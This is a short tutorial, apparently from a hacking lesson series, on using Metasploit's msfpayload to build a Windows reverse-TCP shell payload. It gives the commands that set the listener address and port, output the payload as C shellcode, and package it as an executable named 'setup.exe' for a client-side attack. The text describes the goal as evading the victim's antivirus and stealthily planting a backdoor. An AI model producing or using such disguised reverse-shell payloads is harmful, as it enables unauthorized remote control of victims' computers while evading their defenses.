Step 1: Explore Msfpayload
Let’s start by exploring msfpayload as part of the Metasploit suite. By typing msfpayload with the –h switch, we can get the help screen on this module.
msfpayload -h
Notice in the screenshot above that the syntax for this module includes options, the payload, and then several values that enable us to encode the payload using various programming languages including C, Perl, Ruby, Raw, VBA and others.
Msfpayload enables us to convert the code of the payload into any of these choices and thereby better evade the victim’s AV software.
Step 2: Generate a Custom Payload
Let’s proceed to generate a customized payload in C.
msfpayload windows/shell/reverse_tcp -o
Notice that we used the –o option and Metasploit displays our various options. To generate the the customized payload we need to pass the options to Metasploit, in this case the LHOST and the LPORT. Let’s set those to our machine 192.168.100.1 and the LPORT to 4441.
We need to now generate a custom payload in C by typing:
msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C
Notice that we appended the command with a capital C to indicate that we wanted the payload to be generated in C. As you can see from screenshot above, Metasploit generated the payload in C and displayed it to us.
Step 3: Generate the Binary Code
Finally, we need to generate a binary executable for the shellcode which can use in our client side attack.
msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 X > setup.exe
We have now created an executable file by using the X option and then sent this file to the current folder and named the file setup.exe. We can now use this new payload in a client-side attack and the victim’s AV software will be unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.
And that's it! Stay tuned for my next lesson, where we'll explore ways to disable the client AV software altogether.